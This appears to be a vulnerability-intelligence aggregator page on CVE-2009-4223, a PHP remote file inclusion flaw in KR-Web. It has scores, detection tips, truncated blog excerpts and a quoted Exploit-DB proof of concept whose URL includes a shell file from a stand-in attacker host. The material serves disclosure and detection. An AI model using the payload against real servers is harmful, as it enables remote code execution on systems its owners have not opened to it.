CVE-2009-4223
published 2009-12-07CVE-2009-4223: PHP remote file inclusion vulnerability in adm/krgourl.php in KR-Web 1.1b2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
55.51%
98.9th percentile
PHP remote file inclusion vulnerability in adm/krgourl.php in KR-Web 1.1b2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gianni_tommasi | kr-php_web_content_server | <= 1.1 | — |
| gianni_tommasi | kr-php_web_content_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for GET requests to /adm/krgourl.php with a URL-valued DOCUMENT_ROOT parameter, indicating an RFI attempt. ↗
- →The Nuclei template matches on HTTP 200 response status combined with an outbound HTTP interaction (interactsh callback), confirming successful RFI trigger. ↗
- →The PoC appends a ?cmd query string to the included remote file URL, which is a common shell command-execution pattern to watch for in DOCUMENT_ROOT parameter values. ↗
- ·The vulnerability is limited to KR-Web versions 1.1b2 and earlier; later versions are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
kr-web 1.1b2 - Remote File Inclusion
exploitdb·2009-11-24
CVE-2009-4223 kr-web 1.1b2 - Remote File Inclusion
kr-web 1.1b2 - Remote File Inclusion
---
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#KR-Web
#PoC : http://server/[path]/adm/krgourl.php?DOCUMENT_ROOT=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################
/##############################################\
# all member at sekuritionline.net #
# all member at manadocoding.net #
\##############################################/
[ Gorontalo / 2009 ]
Nuclei
KR-Web <=1.1b2 - Remote File Inclusion
nuclei·CVSS 7.5
CVE-2009-4223 [HIGH] KR-Web <=1.1b2 - Remote File Inclusion
KR-Web <=1.1b2 - Remote File Inclusion
KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
Template:
id: CVE-2009-4223
info:
name: KR-Web <=1.1b2 - Remote File Inclusion
author: geeknik
severity: high
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
impact: |
An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure.
remediation: |
Upgrade to a patched version of KR-Web or apply the necessary security pat
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2009-12-07
Published